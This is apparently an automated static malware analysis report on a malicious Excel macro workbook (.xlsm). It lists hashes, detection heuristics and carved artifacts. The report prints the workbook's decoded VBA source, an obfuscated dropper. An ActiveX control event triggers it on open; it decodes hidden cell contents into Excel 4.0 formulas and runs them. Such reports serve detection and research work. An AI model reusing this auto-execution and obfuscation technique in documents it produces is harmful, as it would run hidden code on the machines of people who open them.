Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 c9aa6f234f2c1077…

MALICIOUS

Office (OOXML) / .XLSM

33.6 KB First seen: 2026-05-20
MD5: 1e5d0bdf39aaea20c463152b84eaa1ad
SHA-1: fd65ceff6221c99e8dbc6c2917a43fb526eec030
SHA-256: c9aa6f234f2c1077aa6bf2039e304314a5faeb380888d256140f8e1ecc0237b6
130 Risk Score

Heuristics 5

  • Excel 4.0 macro sheet (2 sheet(s)) critical OOXML_XLM_MACROSHEET
    Malformed OOXML local headers contain an Excel 4.0 (XLM) macro sheet. XLM was a major Office malware vector during 2020-2022 and is rarely used in modern legitimate workbooks.
  • ActiveX control high OOXML_ACTIVEX
    Malformed OOXML local headers contain ActiveX controls — can execute code
  • VBA project inside OOXML medium OOXML_VBA
    Malformed OOXML local headers contain vbaProject.bin — VBA macros present
  • Malformed OOXML package with recoverable local headers low OOXML_MALFORMED_ZIP_LOCAL_HEADERS
    The OOXML ZIP central directory is invalid or missing, but local file headers expose a recoverable Office package. This can create parser divergence between tolerant Office/ZIP readers and scanners that rely only on the central directory.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL
    • http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/main In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac In document text (OOXML body / shared strings)

Extracted artifacts 5

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
vbaProject_00.bin vba-project Malformed OOXML local-header VBA project: xl/vbaProject.bin 18944 bytes
SHA-256: a97b287e0a0f08bffc3e0ceda11ad21ce4ddc84be6e76276d0cbf8b7a4789e38
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from malformed OOXML local headers) 1774 bytes
SHA-256: a9b2d58fa94069ee7e289ee810bf2aebd34b12fdedfc49cd82587b871aa55e8e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "brt_apri_a, 7, 0, MSForms, Frame"
Sub Sal_Apr()
Application.OnTime Now, "querytabs"
End Sub
Private Sub brt_apri_a_Layout()
Sal_Apr
End Sub

Attribute VB_Name = "Modulo1"
Function limms()
limms = "_a"
End Function
Function tutto1() As String
tutto1 = "ORN"
End Function
Sub mesagiossd()
On Error Resume Next
Run (((((((((((Right(limms & "i" & tutto1 & limms, Fogglios("r" & limms & tutto1 & limms)))))))))))))
End Sub
Private Function Fogglios(g As String)
Fogglios = Len(g) - 3
End Function
Sub querytabs()
re = "=RI": Dim z As Integer: z = 1
h = "T" & tutto1 & "O()"
Sheets(z).Cells(7, z).value = re & h
m = questaA((re & h), 5)
Sheets(z).Cells(z, z).Name = tutto1 & limms: a = z * 3:
For Each U In Sheets(2).UsedRange.SpecialCells(xlCellTypeConstants): b = b & U: Next
For S = a To Len(b) Step a
If (S Mod 2) Then w = -1 Else w = z
mm = mm & Chr(Asc(Mid(b, S, z)) + w): Next
gg = Split(mm, "|")
For Each Q In gg
m = questaA("=" & Replace(Q, "[", "J"), z)
mesagiossd
Next
End Sub
Function questaA(w As String, d As Integer)
nn = 1
Sheets(nn).Cells(d, nn).FormulaLocal = w
End Function
activex_00.bin ooxml-activex Malformed OOXML ActiveX control: xl/activeX/activeX1.bin 2560 bytes
SHA-256: b127a721552d75b1e47d8283a2f8071cf9f51567b54b3ecaa7e2e65a82538694
xlm_sheet_04.xml xlm-macrosheet Malformed OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 885 bytes
SHA-256: 66a73c54e6ce77f7a7273f0dcd0e1f5e17e387e034ea8c037999e896769a7a49
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A1"/><sheetViews><sheetView showFormulas="1" topLeftCell="I50" workbookViewId="0"><selection activeCell="F81" sqref="F81"/></sheetView></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><sheetData/><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" horizontalDpi="300" verticalDpi="300" r:id="rId1"/></xm:macrosheet>
xlm_sheet_05.xml xlm-macrosheet Malformed OOXML XLM macro sheet: xl/macrosheets/sheet2.xml 985 bytes
SHA-256: 559be326357c3e44ef6adf86eb55c19f7041f0cb92e73bcc223e48b8c0008f0b
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="C24"/><sheetViews><sheetView showFormulas="1" topLeftCell="A43" workbookViewId="0"><selection activeCell="E60" sqref="E60"/></sheetView></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><sheetData><row r="24" spans="3:3" x14ac:dyDescent="0.25"><c r="C24" s="1" t="s"><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" horizontalDpi="300" verticalDpi="300" r:id="rId1"/></xm:macrosheet>